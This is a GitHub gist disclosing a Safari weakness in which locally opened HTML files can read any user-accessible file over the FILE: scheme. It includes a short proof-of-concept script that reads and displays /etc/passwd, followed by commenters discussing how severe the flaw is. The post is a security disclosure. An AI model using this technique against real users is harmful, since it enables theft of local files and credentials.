Skip to content

Instantly share code, notes, and snippets.

@rongarret
Last active August 29, 2015 14:17
Show Gist options
  • Save rongarret/d8987c9cd57bd768e1de to your computer and use it in GitHub Desktop.
Save rongarret/d8987c9cd57bd768e1de to your computer and use it in GitHub Desktop.
Safari FILE: scheme security hole
It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.
<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
$.ajax({url: '/etc/passwd'}).done(function (s) {
$('body').html('<pre>' + s + '</pre>');
});
</script>
Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.
UPDATE: Turns out this is a known problem:
https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format
@chesleybrown
Copy link

Ah, now that's not nearly as bad as I had originally thought. I was losing my mind there for a few minutes thinking "No way... no way is it that simple". lol

@rongarret
Copy link
Author

I dunno, this seems pretty bad to me. Why do you think it's not?

@sandrogauci
Copy link

@rongarret I think @chesleybrown thought that the file could be hosted on a website and display local files. It needs to be opened locally for it to be able to read local files.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment